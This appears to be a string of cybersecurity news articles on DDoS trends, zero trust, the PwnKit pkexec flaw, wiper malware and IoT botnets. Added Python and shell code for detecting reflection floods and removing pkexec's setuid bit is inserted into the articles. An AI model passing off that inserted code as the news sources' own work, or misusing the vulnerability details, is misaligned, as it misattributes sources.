There also was a rise in the second half of the year in the number of attacks that lasted longer than an hour. As in the first six months, most attacks were short-lived, but those lasting 30 minutes or less made up 57 percent of all incidents in the second half of 2021, down from 74 percent. Meanwhile, those lasting more than an hour made up 27 percent of attacks, more than twice the 13 percent in the first half of the year.

“It’s important to note that for longer attacks, each attack is typically experienced by customers as a sequence of multiple short, repeated burst attacks,” Vij and Pasha wrote. “One such example would be the 3.25 Tbps attack mitigated, which was the aggregation of four consecutive short-lived bursts that each ramped up in seconds to terabit volumes.”
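Two of the observations above translate directly into detection logic: the attack vectors are UDP reflection off well-known services (SSDP, CLDAP, DNS, NTP), which show up at the victim as floods with those service ports as the source port, and a long attack is really a train of short bursts that should be counted as one event. The following is an added example, not Microsoft's Azure DDoS Protection logic: it buckets constructed flow records into fixed windows, flags windows where reflected traffic exceeds a packet-rate threshold, and merges flagged windows for the same victim into attacks while tolerating a lull between bursts. The threshold, window size and gap tolerance are assumptions for the demo, not production values.

```python
"""Flag UDP reflection floods in flow records and merge the short bursts that
make up one attack.

Added example, not Microsoft's Azure DDoS Protection logic. The flow records
are constructed; the thresholds, window size and gap tolerance are assumptions
for the demo, not production values.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# UDP services commonly abused as reflectors, keyed by the source port the
# victim sees on the reflected replies.
REFLECTOR_PORTS = {53: "DNS", 123: "NTP", 389: "CLDAP", 1900: "SSDP", 11211: "Memcached"}


class Flow(NamedTuple):
    ts: int        # epoch seconds
    src_ip: str
    src_port: int
    dst_ip: str
    packets: int


def bucket_reflection(flows: List[Flow], window: int = 10) -> Dict[Tuple[str, int], Dict[str, int]]:
    """Sum reflected packets per (victim, window start), broken down by vector."""
    agg: Dict[Tuple[str, int], Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for f in flows:
        vector = REFLECTOR_PORTS.get(f.src_port)
        if vector is None:
            continue   # not a reflector port: ignored by this detector
        agg[(f.dst_ip, f.ts // window * window)][vector] += f.packets
    return agg


def flag_windows(agg, pps_threshold: int, window: int = 10) -> List[Tuple[str, int, Dict[str, int]]]:
    """Windows whose reflected packet rate meets or exceeds the threshold."""
    hits = []
    for (victim, start), vectors in sorted(agg.items()):
        if sum(vectors.values()) / window >= pps_threshold:
            hits.append((victim, start, dict(vectors)))
    return hits


def merge_bursts(hits, window: int = 10, max_gap: int = 60) -> List[dict]:
    """Coalesce flagged windows for one victim into attacks, tolerating lulls
    of up to max_gap seconds; each lull starts a new burst within the attack."""
    attacks: List[dict] = []
    for victim, start, vectors in hits:
        cur = attacks[-1] if attacks else None
        if cur and cur["victim"] == victim and start - cur["end"] <= max_gap:
            if start > cur["end"]:
                cur["bursts"] += 1
            cur["end"] = start + window
            for v, n in vectors.items():
                cur["vectors"][v] = cur["vectors"].get(v, 0) + n
        else:
            attacks.append({"victim": victim, "start": start, "end": start + window,
                            "bursts": 1, "vectors": dict(vectors)})
    for a in attacks:
        a["duration"] = a["end"] - a["start"]
    return attacks


def detect(flows: List[Flow], pps_threshold: int = 1000, window: int = 10,
           max_gap: int = 60) -> List[dict]:
    agg = bucket_reflection(flows, window)
    return merge_bursts(flag_windows(agg, pps_threshold, window), window, max_gap)


def sample_flows() -> List[Flow]:
    """Constructed records: two bursts against one victim plus background noise."""
    flows = []
    victim = "203.0.113.10"
    for ts in (1000, 1010):            # burst 1: two back-to-back windows, SSDP + CLDAP
        for i in range(200):
            flows.append(Flow(ts + i % 10, f"198.51.100.{i % 250}",
                              1900 if i % 2 == 0 else 389, victim, 100))
    for i in range(200):               # burst 2 after a 30-second lull: DNS + NTP
        flows.append(Flow(1050 + i % 10, f"192.0.2.{i % 250}",
                          53 if i % 2 == 0 else 123, victim, 100))
    for i in range(20):                # ordinary DNS answers to another host
        flows.append(Flow(1005 + i, "192.0.2.53", 53, "203.0.113.20", 3))
    flows.append(Flow(1000, "198.51.100.9", 44321, victim, 50000))  # not a reflector port
    return flows


if __name__ == "__main__":
    for a in detect(sample_flows()):
        print(a)
```

The gap tolerance is the parameter that decides whether the four bursts of the 3.25 Tbps event are reported as one attack or four; set it from how long your mitigation stays engaged after traffic drops, so the reported duration matches what the customer experienced. The vector breakdown per attack is what tells you which reflector protocols to rate-limit at the edge first.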

[Figure: DDoS attack duration, first half vs. second half of 2021 (source: Microsoft)]

Gaming Industry a Top DDoS Target

The gaming industry is most targeted by DDoS attacks, but Microsoft is finding that other industries – including financial institutions, media, internet service providers (ISPs), retailers and supply-chain companies – are seeing an increase in such incidents.

UDP attacks accounted for 55 percent of all DDoS campaigns, a 16 percent increase over the first half of 2021.

“UDP is commonly used in gaming and streaming applications,” they wrote. “The majority of attacks on the gaming industry have been mutations of the Mirai botnet and low-volume UDP protocol attacks. An overwhelming majority were UDP spoof floods, while a small portion were UDP reflection and amplification attacks, mostly SSDP, Memcached, and NTP.”

In addition, while the United States continues to be the top target, sustaining 54 percent of attacks, there was a spike in attacks in India – from 2 percent to 23 percent – and there was a drop in Europe, from 19 percent in the first half to 6 percent in the second.

IoT Devices Multiply Attacks

There are multiple reasons for the uptick in, and growing sophistication of, DDoS attacks. As Vii and Pasha noted, the rise of inexpensive DDoS services – giving even the least experienced threat actors a cheap way to launch such attacks – is a factor. In addition, the proliferation of Internet of Things (IoT) devices is giving hackers a large number of targets to be hijacked and absorbed into a botnet that can then be used in increasingly larger DDoS attacks.

“DDoS attacks are increasing in both volume and force due to the enormous number of vulnerable IoT devices that cyber criminals leverage to create botnets,” Bud Broomhead, CEO of cybersecurity firm Viakoo, told eSecurity Planet. “IoT vulnerabilities must be quickly remediated in order to eradicate the risk of them being used in cyberattacks.”

Cybersecurity firm CrowdStrike this month released a report noting a 35 percent year-over-year increase in 2021 of malware targeting Linux-based IoT devices, with the primary goal of compromising the devices and pulling them into a botnet for use in DDoS attacks. Other companies, such as Kaspersky and NetScout, also have reported rises in DDoS attacks over the past year.


Skilled Adversaries Raise Stakes

“DDoS attacks remain a persistent, malicious technique regularly used by countless threat actors,” Stefano De Blasi, cyber threat intelligence analyst at Digital Shadows, told eSecurity Planet. “Although DDoS attacks are frequently associated with technically unsophisticated attackers, these events remind us that highly skilled adversaries can mount high-intensity operations that may result in severe consequences for their targets.”

De Blasi said there are a range of motivations behind such attacks, which typically aim to temporarily disrupt a target’s infrastructure or act as a decoy for more dangerous activity.

“However, attacks like the ones reported by Microsoft are a powerful reminder that some DDoS attacks can have a significant impact standing on their own,” he said. “In fact, organizations affected by high-intensity DDoS attacks may experience a long-time interruption of business, which may cause financial loss, brand or reputational damage and influence customer trust.”

Yehuda Rosen, senior software engineer at cybersecurity company nVisium, told eSecurity Planet that while DDoS “is a nuisance for most companies,” it can be more dangerous when it involves mission-critical services, including traffic lights, medical charts and water pumps.

“Ransomware attacks can be avoided by simply following best practices around information security, backups, and updates, but DDoS can occur despite doing everything correctly,” Rosen said. “Even the best DDoS-protection companies aren’t immune to attacks such as these.”

White House Boosts Zero Trust with New Cybersecurity Strategy https://www.esecurityplanet.com/networks/white-house-zero-trust-cybersecurity-strategy/ Thu, 27 Jan 2022 19:25:46 +0000

The Biden Administration is pushing federal agencies to adopt a zero-trust security architecture to protect themselves and their data from “increasingly sophisticated and persistent threat campaigns,” according to a new strategy issued this week by the Office of Management and Budget (OMB).

According to the White House order, agencies have until the end of the government’s fiscal year 2024 to reach the target goals laid out in the strategy and based on a zero-trust model developed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

The 29-page memorandum from Acting OMB Director Shalanda Young comes less than a year after President Biden issued his executive order calling for the improvement of the government’s cybersecurity posture in the wake of a series of attacks that impacted agencies and endangered critical infrastructure, including those on SolarWinds and Colonial Pipeline.

An initial draft of the plan was released in September to gather public input, including from the cybersecurity industry.

“In the current threat environment, the Federal Government can no longer depend on conventional perimeter-based defenses to protect critical systems and data,” Young wrote. “A transition to a ‘zero trust’ approach to security provides a defensible architecture for this new environment. … It is a dramatic paradigm shift in philosophy of how we secure our infrastructure, networks, and data, from verify once at the perimeter to continual verification of each user, device, application, and transaction.”


Zero Trust Gains Momentum

Zero-trust architecture efforts have gained momentum in an IT environment that is increasingly distributed and mobile, located not only within corporate data centers but increasingly spread among mobile devices, the cloud and the edge.

Central to a zero-trust architecture is the premise that anything and anyone trying to access a network or infrastructure cannot be trusted and must be verified, and that they must be continuously verified throughout the transaction – and given access to no more than the resources they need. Microsegmentation has been one of the critical tools used to achieve zero trust, carving networks into small segments to limit risk.

Zero trust is a fast-growing security technology, with KBY Research analysts predicting the market will grow an average of 18.8 percent a year through 2026, when it will hit $54.6 billion.


Support for Zero Trust

The government’s embrace of a zero-trust strategy was applauded by many in the cybersecurity field.

“Zero trust is becoming table stakes for organizations to protect themselves online,” John Engates, field CTO for Cloudflare, a web infrastructure and security company, told eSecurity Planet. The “directive from the White House signals that the federal government is taking cybersecurity threats seriously and is adopting a strategy that will better protect the nation’s cyber infrastructure, and by extension, United States national security. Zero trust shouldn’t be seen as just another product or industry buzzword – it’s a fundamental shift in security philosophy.”


The FIDO Alliance, an open industry alliance aimed at creating improved authentication technologies that reduce reliance on passwords, also endorsed the government’s zero-trust strategy. In a statement, alliance Executive Director Andrew Shikiar zeroed in on the requirement to use phishing-resistant authentication tools, noting that some phishing attacks have become sophisticated enough to get around even multi-factor authentication (MFA) technologies.

Tim Erlin, vice president of strategy at cybersecurity vendor Tripwire, told eSecurity Planet that shifting the entire government to a zero-trust architecture is an important but difficult task, and that the strategy falls short in a couple of crucial ways.

“It’s unfortunate that this memorandum doesn’t provide a clearer role for what NIST identifies as one of the key tenets for zero trust: integrity monitoring,” Erlin said. “Documents from both CISA and NIST include integrity monitoring as a key component of zero trust, but the OMB memorandum doesn’t include similar treatment.”

He also said that focusing so much on endpoint detection and response (EDR) – which is evolving into managed detection and response (MDR) and extended detection and response (XDR) – may create an over-reliance on a technology that is already morphing into something newer and more comprehensive.

Verification Over Trust

According to the OMB memorandum, the goal is to get to a point where employees have enterprise-managed accounts that give them access to the applications and data they need while protecting them from outside threats, where the devices they use are consistently tracked and monitored, and where agency systems are isolated from each other.

In addition, enterprise applications will be tested internally and externally and made available in a secure manner over the internet.

“A key tenet of a zero trust architecture is that no network is implicitly considered trusted – a principle that may be at odds with some agencies’ current approach to securing networks and associated systems,” Young wrote. “All traffic must be encrypted and authenticated as soon as practicable.”

The strategy will rely on five complementary pillars outlined in a zero-trust maturity model developed by CISA. The strategic goals include:

  • enterprise-managed identities to access applications
  • a complete inventory of devices authorized and used
  • the ability to respond to and prevent incidents on those devices
  • networks encrypting all DNS requests and HTTP traffic
  • creating isolated environments

In addition, all applications will be treated as internet-connected and consistently tested, and agencies will use data categorization as well as leverage cloud security services to monitor access to sensitive data. There also will be enterprise-wide logging and information-sharing.


Fast Tracking Cybersecurity

Government agencies now have 30 days to designate a lead for implementing the strategy within their organization and 60 days to submit an implementation plan to OMB.

“While the concepts behind zero trust architectures are not new, the implications of shifting away from ‘trusted networks’ are new to most enterprises, including many agencies,” Young wrote. “This process will be a journey for the Federal Government, and there will be learning and adjustments along the way as agencies adapt to new practices and technologies.”

CISA Director Jen Easterly said in a statement that “as our adversaries continue to pursue innovative ways to breach our infrastructure, we must continue to fundamentally transform our approach to federal cybersecurity. Zero trust is a key element of this effort to modernize and strengthen our defenses. CISA will continue to provide technical support and operational expertise to agencies as we strive to achieve a shared baseline of maturity.”

Government officials pointed to attempts by state-sponsored and other hacking groups to exploit the flaw recently found in Log4j as the latest example of threat actors trying to leverage new ways to get in the networks and other infrastructure of targets. The vulnerability – dubbed Log4Shell – is a significant threat because the Java logging tool is free and widely distributed, exposing large numbers of servers and cloud services to a vulnerability that is easily exploitable. Threat intelligence experts have found numerous incidents of cybercriminal groups trying to find ways to exploit the flaw since knowledge of it became public in early December.

Easily Exploitable Linux Flaw Exposes All Distributions: Qualys https://www.esecurityplanet.com/threats/pwnkit-linux-flaw-hits-all-distributions/ Wed, 26 Jan 2022 19:48:30 +0000

An easily exploited flaw in a program found in every major Linux distribution is the latest serious security issue that has arisen in the open-source space in recent weeks.

Researchers at cybersecurity vendor Qualys this week disclosed a memory corruption vulnerability in polkit’s pkexec that, if exploited by a bad actor, enables an unprivileged user to gain full root privileges on a system.

The vulnerability, tracked as CVE-2021-4034, has “been hiding in plain sight” for more than 12 years and affects all versions of polkit’s pkexec since it was first developed in 2009, Bharat Jogi, director of vulnerability and threat research at Qualys, wrote in a blog post.

Polkit’s (formerly PolicyKit) pkexec is a component used to control system-wide privileges in Unix-like operating systems, enabling non-privileged processes to communicate with privileged processes in an organized fashion. It also can be used to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed with root permission.

The flaw can’t be exploited remotely, but if an attacker can log in as any unprivileged user, the vulnerability can be quickly exploited, according to Qualys. Red Hat rated the severity of the flaw a 7.8 out of 10 on the CVSS scale.


Every Linux Distribution is Vulnerable

The pkexec component is widely used; it’s installed by default in every major Linux distribution, and Qualys was able to verify the vulnerability, develop an exploit and gain full root privileges on installations of Ubuntu, Debian, Fedora and CentOS, Jogi wrote, adding that “other Linux distributions are likely vulnerable and probably exploitable.”

He wrote that Qualys won’t publish exploit code for the vulnerability – dubbed PwnKit – but said that “given how easy it is to exploit the vulnerability, we anticipate public exploits to become available within a few days of this blog’s post date.”

Vulnerabilities like PwnKit – which have been present for more than a decade and are ubiquitous in Linux distributions and, therefore, enterprises – pose a significant challenge for security teams, according to Greg Fitzgerald, co-founder and chief experience officer for cybersecurity firm Sevco Security. The priority for organizations should be to patch their Linux machines, but it’s not an easy task.

“That’s all well and good for the machines that IT and security teams know about, but there are not many companies with an accurate IT asset inventory that dates back more than a decade,” Fitzgerald told eSecurity Planet. “The unfortunate reality is that many organizations that patch all of the machines they’re aware of will still be susceptible to this vulnerability because they do not have an accurate inventory of their IT assets. You can’t apply a patch to an asset you don’t know is on your network. Abandoned and unknown IT assets are often the path of least resistance for malicious actors trying to access your network or data.”

Figure: Qualys PwnKit detection


Patching Open-Source Systems a Challenge

Bud Broomhead, CEO of cybersecurity company Viakoo, told eSecurity Planet that patching a flaw on open-source systems can be challenging for enterprises.


“Unlike fully proprietary systems where a single manufacturer can issue a single patch to address a vulnerability, a single open-source vulnerability can be present in multiple systems – including proprietary ones – which then requires multiple manufacturers to separately develop, test and distribute a patch,” Broomhead said. “For both the manufacturer and end user, this adds enormous time and complexity to implementing a security fix for a known vulnerability.”

Yaniv Bar-Dayan, co-founder and CEO of Vulcan Cyber, said that a vulnerability that gives root access on a Linux system is bad, but that “fortunately, this vulnerability is a local exploit, which mitigates some risk. Until patches are broadly available, SysAdmins can remove the SUID bit from pkexec – using: # chmod 0755 /usr/bin/pkexec – to temporarily mitigate the problem.”
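An audit helper for the stopgap Bar-Dayan describes, added here as an example and not code from the article, Qualys or Vulcan Cyber: it reports whether a pkexec binary still carries the setuid bit, applies the mode-0755 change and verifies it, and lists the other setuid files under a directory so the change can be reviewed alongside the rest of the host's setuid surface. The path /usr/bin/pkexec is the one quoted above; the function names and the directory scan are assumptions of this example.

```shell
#!/bin/sh
# Added audit helper for the pkexec setuid stopgap quoted above; not code from
# the article, Qualys or Vulcan Cyber. Only /usr/bin/pkexec comes from the
# quote; the function names and the directory scan are this example's own.
# pkexec needs the setuid bit to do its job, so the change is a temporary
# measure and the distribution's mode should be restored once the patch is in.

# is_setuid PATH: succeeds (exit 0) when PATH is a regular file whose mode
# carries the setuid bit. `find -perm -4000` is POSIX and, given a file
# argument, does not descend, so no GNU/BSD-specific stat flags are needed.
is_setuid() {
    [ -f "$1" ] && [ -n "$(find "$1" -perm -4000 -print 2>/dev/null)" ]
}

# pkexec_report PATH: print a one-line verdict for a pkexec binary.
# Exit status: 0 = setuid bit still set (exposed until patched),
#              1 = bit cleared (stopgap in place), 2 = file not present.
pkexec_report() {
    path="$1"
    if [ ! -f "$path" ]; then
        printf '%s: not installed\n' "$path"
        return 2
    fi
    if is_setuid "$path"; then
        printf '%s: setuid bit set - exposed while unpatched (%s)\n' \
            "$path" "$(ls -ld "$path" | cut -d' ' -f1)"
        return 0
    fi
    printf '%s: setuid bit cleared - stopgap in place\n' "$path"
    return 1
}

# clear_setuid_bit PATH: apply the quoted mitigation (mode 0755) and confirm
# the bit is really gone; succeeds only when that verification passes.
clear_setuid_bit() {
    chmod 0755 "$1" || return 1
    if is_setuid "$1"; then
        return 1
    fi
    return 0
}

# list_setuid_files DIR: every regular setuid file under DIR on the same
# filesystem, so the pkexec change can be reviewed next to the rest of the
# host's setuid surface (anything unexpected in this list deserves a look).
list_setuid_files() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# Stand-alone use: report on the system pkexec (or the path given as $1).
# The status code is not propagated here so the helper functions can be
# loaded by other scripts without the report aborting them.
pkexec_report "${1:-/usr/bin/pkexec}" || :
```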


Flaw Found in November

Qualys discovered the vulnerability in November 2021 and notified Red Hat. This week the announcement of PwnKit was made in coordination with Red Hat and other distributors.

“Given the breadth of the attack surface for this vulnerability across both Linux and non-Linux OS, Qualys recommends that users apply patches for this vulnerability immediately,” Jogi wrote. “We expect vendors to release patches for this vulnerability in the short term. Qualys Patch Management can be used to deploy those patches to vulnerable assets, when available.”

The PwnKit flaw comes in the wake of other recent disclosures about security issues involving open-source software. At the top of the list is the critical remote code execution flaw in Log4j – dubbed Log4Shell – that was revealed in December and has been targeted by state-sponsored hacking groups looking to leverage the vulnerability to stage attacks.

In the Wake of Log4j

Like polkit’s pkexec, Log4j – a Java logging tool – has broad enterprise use across data centers and cloud-based services that could be exposed to the zero-day vulnerability. Log4j is a free and widely distributed open-source tool from the Apache Software Foundation and the flaw affects versions 2.0 through 2.14.1. Log4Shell is tracked as CVE-2021-44228.

In addition, a report released this month by CrowdStrike found that incidents of malware targeting Linux-based Internet of Things (IoT) devices grew by more than a third year-to-year in 2021, with the primary goal being to compromise the devices, pull them into botnets and use them for distributed denial-of-service (DDoS) attacks.

“With various Linux builds and distributions at the heart of cloud infrastructures, mobile and IoT, it presents a massive opportunity for threat actors,” a CrowdStrike researcher wrote in a blog post.

Open Source in the Crosshairs

“Threat actors find open-source systems extremely attractive,” Viakoo’s Broomhead said. “Vulnerabilities that exploit open-source systems – like the recent Log4j vulnerability – require patches and updates to be developed by multiple device or system manufacturers, and threat actors are betting on some manufacturers being slow in releasing fixes and some end users being slow in updating their devices.”

He said enterprises need a software bill of materials to make finding vulnerable systems easier, automated deployment of security fixes, and an extension of zero-trust architecture to IoT and operational technology (OT) systems, which “can add additional security to prevent vulnerabilities from being exploited.”

Vulcan Cyber’s Bar-Dayan said the “open-source software model is a two-edged blade. On one side, everyone can look at the code and audit it to identify and patch vulnerabilities. On the other side, threat actors can look at the code and find subtle issues that everyone else has missed. The advantages of this model have historically outweighed the disadvantages, with many eyes on the code and patches frequently appearing very rapidly after a vulnerability comes to light.”

Improved auditing will help catch and correct vulnerabilities before they are used in the wild, and improved integration with vulnerability and patch management tools will make OSS-based systems even more secure and easy to maintain, he said.

CISA, Microsoft Warn of Wiper Malware Amid Russia-Ukraine Tensions https://www.esecurityplanet.com/threats/cisa-microsoft-warn-of-wiper-malware/ Sat, 22 Jan 2022 00:35:52 +0000

The U.S. government agency overseeing cybersecurity is urging the country’s businesses and other organizations to take the necessary steps to protect their networks from any spillover that might occur from the ongoing cyberattacks aimed at Ukraine government agencies and private companies.

In an alert issued this week, the Cybersecurity and Infrastructure Security Agency (CISA) cited a series of cyberattacks perpetrated against public and private Ukrainian organizations as tensions between Ukraine and Russia grow despite talks between U.S. and Russian government leaders.

Government and private entities in Ukraine have been targeted this month by a barrage of malware that has defaced websites and wiped or corrupted data from Windows- and Linux-based systems. Microsoft’s Threat Intelligence Center, in a blog post Jan. 15, outlined the malware operation that began hitting Ukrainian organizations days before.

Malware Designed to Destroy

The malware “is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom,” the Microsoft unit wrote. “Our investigation teams have identified the malware on dozens of impacted systems and that number could grow as our investigation continues. These systems span multiple government, non-profit, and information technology organizations, all based in Ukraine. … It is unlikely these impacted systems represent the full scope of impact as other organizations are reporting.”

Other organizations also have issued reports about data-wiping and other malware being used against groups in the troubled country. Ukraine’s cyber authorities said in a statement that the malware exploited vulnerabilities in the OctoberCMS content management system and the high-profile Log4j flaw, as well as compromised credentials, to launch the attacks.

Within a couple of days, 95 percent of the Ukrainian government sites impacted by the malware had been restored, they said.


Threats in a Connected World

In light of the attacks and the ongoing geopolitical situation in Ukraine, both CISA and Microsoft urged public and private groups in the United States to use the information to proactively protect their infrastructure against malware attacks that might result from the troubles in that region.

“Public and private entities in Ukraine have suffered a series of malicious cyber incidents, including website defacement and private sector reports of potentially destructive malware on their systems that could result in severe harm to critical functions,” CISA said in its alert. “The identification of destructive malware is particularly alarming given that similar malware has been deployed in the past – e.g., NotPetya and WannaCry ransomware – to cause significant, widespread damage to critical infrastructure.”

No group or nation-state has been accused of the malware attacks in Ukraine, but CISA said cybersecurity and IT staffs should review the detailed document the agency released earlier this month, Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure. They also should check out another government site, StopRansomware.gov, CISA noted.


CISA’s Cybersecurity Checklist

CISA’s alert outlines myriad steps U.S. organizations should take to protect their networks and data from malware attacks, including validating all remote access and instituting multifactor authentication where needed, making sure that software is patched and up-to-date, and ensuring they are prepared to respond to an intrusion.

The steps also include quickly identifying and assessing unusual network behavior, running antivirus and anti-malware solutions on the network and testing backup procedures. CISA also noted the need to test industrial control systems and “if working with Ukrainian organizations, take extra care to monitor, inspect, and isolate traffic from those organizations; closely review access controls for that traffic.”

Chris Gonsalves, vice president of research at Channelnomics, told eSecurity Planet that the CISA alert is part of a larger propaganda campaign by the U.S. government as it pushes back at possible Russian intrusion into Ukraine and looks to ease tension in the region.

“But here’s the thing about propaganda: It can also be true,” Gonsalves said. “Warnings about global climate change are also propaganda. The information is designed to foment a change in the belief or behavior. They’re also factually correct and that’s the same thing here.”


Out of the Lab and Into the Wild

The reference to NotPetya and WannaCry – a notorious ransomware from North Korea rather than Russia – makes sense because both were very targeted pieces of malware that eventually got into the wild and affected targets that were beyond what was initially intended. The threat from the malware attacks this month in Ukraine to companies and agencies outside of the region is similar, he said.

As noted in the CISA alert, companies that do business with Ukrainian counterparts may be impacted by a phishing email or other threats that make their way through the Ukraine companies’ networks and to their global partners.

“They called these things computer viruses originally because they behave exactly like biological viruses, and that once they get out of the lab, it’s very difficult to contain where they go and who they infect,” Gonsalves said. “The thing about – and this is wiper malware [being used in Ukraine], but it works the same with ransomware – is that phishing messages get forwarded and partner networks are integrated together and there are hidden credentials between third parties that we’re not aware of. When I attack a utility in the Ukraine, I see that particular network might be connected through supply chain links to some organization in the U.S. that were never my intended target, but that’s just the way internet connections work. It’s not like they are also going to be targeted. They’re collateral damage.”


Good Security Advice

Once the possible threat is established, the question becomes whether what CISA is telling organizations through the checklist is effective. In this case, it’s essentially a rewording of the NIST CSF, hitting the high notes of delineating, identifying, protecting, detecting and recovering.

“God bless them for staying on message and using their absolute best cybersecurity framework to continue to get people to do the very basic things that they need to do to protect themselves,” Gonsalves said. “All of this information is applicable and proven to be effective.”

Gonsalves also was pleased to see CISA note the need to protect industrial control systems, as infrastructure will be better protected the more the line between those control systems and traditional IT blurs.

Review Security in Light of Pandemic

One point CISA could have raised is that many companies may believe they’ve addressed the items on the checklist, but haven’t done so in light of the COVID-19 pandemic, which widely dispersed much of their workforces.


“You have remote access in places you’ve never had it before,” Gonsalves said. “Do you really have a handle on your access management and your credentials the way you did two years ago in this new world order that we’re in, where everybody’s a remote worker and completely decentralized? Yeah, look at this list, but also review it through the lens of the way that you work in the COVID and post-COVID environment, because many of these elements are much more crucial and have changed radically over the last year.”

He also suggested that CISA issue this checklist on a continuous basis.

“You should issue this memo on the first day of every quarter for the rest of our lives,” Gonsalves said. “Even on days when Russia is not menacing its neighbors, this is really good advice.”

Attacks Escalating Against Linux-Based IoT Devices https://www.esecurityplanet.com/threats/attacks-escalating-against-linux-based-iot-devices/ Thu, 20 Jan 2022 20:04:38 +0000

Incidents of malware targeting Linux-based Internet of Things (IoT) devices jumped by more than a third in 2021, with three malware families the primary drivers behind the increase.

According to a report by CrowdStrike, there was a 35 percent year-over-year growth in 2021 of malware targeting these devices, and the XorDDoS, Mirai and Mozi families were responsible for 22 percent of all Linux-based IoT malware. There was a 10-fold increase in the number of samples of Mozi found in the wild, Mihai Maganu, a threat researcher at CrowdStrike, wrote in a blog post.

The primary goal of all this malware is to compromise the devices and systems, pull them into a botnet and use them for distributed denial-of-service (DDoS) attacks, Maganu wrote. That echoes similar reports showing an increase in DDoS attacks worldwide. Kaspersky researchers last year found that such attacks increased by about a third year-over-year in the third quarter of 2021.

Microsoft Azure last year said it was able to stave off a record DDoS attack against a European customer.

Also read: Top 8 DDoS Protection Service Providers for 2022

Threats to Open Source, IoT

CrowdStrike’s numbers highlight not only the threat to open-source technologies – see Log4j – but also the threat from IoT devices, long a concern for enterprises as those devices become more connected and more intelligent.

Linux is widely used in web servers and cloud infrastructure, but the open-source software also is broadly adopted in mobile and IoT devices due to its scalability, performance and security. In addition, the broad array of distributions makes it easier to support multiple hardware designs.

However, with more than 30 billion IoT devices expected to be connected to the internet by 2026, attacks against them can have wide-ranging impacts.

“With various Linux builds and distributions at the heart of cloud infrastructures, mobile and IoT, it presents a massive opportunity for threat actors,” he wrote. “For example, whether using hardcoded credentials, open ports or unpatched vulnerabilities, Linux-running IoT devices are a low-hanging fruit for threat actors — and their en masse compromise can threaten the integrity of critical internet services.”

Also read: Top IoT Security Solutions

A Fast-Growing Attack Surface

Bud Broomhead, CEO of cybersecurity vendor Viakoo, told eSecurity Planet that IoT devices are the largest and fastest-growing attack surface for most organizations and that they have more known vulnerabilities targeting them than traditional IT systems.

There is a litany of reasons for this, Broomhead said. Organizations can have as many as 100 times the number of IoT devices as other systems; agent-based vulnerability remediation solutions don’t work with them, but older threat vectors like man-in-the-middle attacks do; and having so many vulnerable IoT devices enables huge botnet armies to be assembled and deployed.

There are other problems, too, including that many IoT devices are managed by line-of-business groups rather than IT and many use non-standard operating systems that traditional IT cybersecurity products don’t work with.

“IoT devices pose two fundamental threats,” he said. “The largest risk is that IoT systems – think water control or pipelines – could be controlled by a threat actor to cause physical damage, loss of life or enable terrorism. Vulnerable IoT devices also pose a threat that they can be used as entry into a network to then laterally move to sensitive corporate data or other systems. Because IoT devices are performing business-critical [and] mission-critical functions, shutting them off is not an option in many cases, making an exploit against them inherently higher risk than IT systems that can be taken offline.”

See also: EU to Force IoT, Wireless Device Makers to Improve Security

Mozi, XorDDoS and Mirai

Mozi is a peer-to-peer (P2P) botnet that was first detected in 2019 and uses the distributed hash table (DHT) system. DHT’s distributed, decentralized lookup mechanism makes it easy for Mozi to hide communications with a command-and-control (C2) server behind a lot of legitimate DHT traffic.

“The use of DHT is interesting because it allows Mozi to quickly grow a P2P network,” Maganu wrote. “And, because it uses an extension over DHT, it’s not correlated with normal traffic, so detecting the C2 communication becomes difficult. Mozi infects systems by brute-forcing SSH and Telnet ports. It then blocks those ports so that it is not overwritten by other malicious actors or malware.”

CrowdStrike in 2021 also saw a 123 percent year-over-year increase in samples of XorDDoS, a Trojan aimed at multiple Linux architectures, including those powered by x86 chips from Intel and AMD as well as Arm processors. The malware uses SSH brute-force attacks to gain remote control of devices and some variants allow bad actors to scan and search for Docker containers, he wrote.

Mirai, a Linux Trojan that has been around since 2016, is similar to Mozi in that it exploits weak protocols and passwords to compromise devices by using brute-force attacks. Its developer published the source code for Mirai, which ramped up the number of variants, including Sora, IZIH9 and Rekai. Identified samples of all three variants rose in 2021, by between 33 percent for Sora and 83 percent for Rekai.

CrowdStrike XorDDOS detection (figure)

Sensitive Data an Attractive Target

It’s not surprising that fast-growing IoT devices have become a popular target for threat actors, according to John Bambenek, principal threat hunter at cybersecurity vendor Netenrich.

“Anything that has sensitive data is an attractive target,” Bambenek told eSecurity Planet. “Criminals want to make money. Spies want to steal information. If valuable enough data was stored on a Commodore 64 to make it worth a criminal’s while, they’ll drop a zero-day on that, too. The problem with IoT devices is they have all the functionality of a Linux machine with no ability to put any protection on it.”

Many require firmware updates rather than patching with tools such as yum or apt, he added, and users can’t deploy endpoint protection on most of them.

“IoT devices have made botnets great again,” Bambenek said.

They also can be an avenue into an enterprise’s network and data, he said. In particular, IoT devices that process sensitive information, such as point-of-sale (POS) devices and medical equipment, can be exploited to steal and exfiltrate data.

IoT Protection Steps

Viakoo’s Broomhead said there are three key steps organizations can take to protect themselves from the threat posed by vulnerable IoT devices, including having a complete inventory of IT assets and remediating them for vulnerabilities. In addition, he recommended implementing an automated IoT vulnerability remediation solution to perform security fixes as soon as possible and extending a zero trust initiative to include IoT hardware.

Bambenek’s first suggestion is to forcefully throw away – to “yeet” – the IoT devices.

“If an organization cannot yeet their unmanaged IoT devices into the abyss, they should put them on isolated network segments and use strong network security tools and IPS to protect those devices and to identify abnormal behavior from them,” he said.

Further reading: Best Patch Management Software


The post Attacks Escalating Against Linux-Based IoT Devices appeared first on eSecurity Planet.

]]>
Iran-Based APT35 Group Exploits Log4J Flaw https://www.esecurityplanet.com/threats/iran-based-apt35-group-exploits-log4j-flaw/ Thu, 13 Jan 2022 22:37:48 +0000 https://www.esecurityplanet.com/?p=20524

]]>
Security researchers are continuing to see state-supported hacking groups developing tools to leverage the high-profile Log4j vulnerability that exploded onto the scene last month even as the White House and other parts of the federal government look for ways to get ahead of the threat.

Check Point Software’s researchers said this week that the Iran-backed advanced persistent threat group APT35 is looking to leverage the critical Apache Log4j flaw to distribute a new modular PowerShell-based framework designed for persistence, gathering information, communicating with a command-and-control (C&C) server and executing commands.

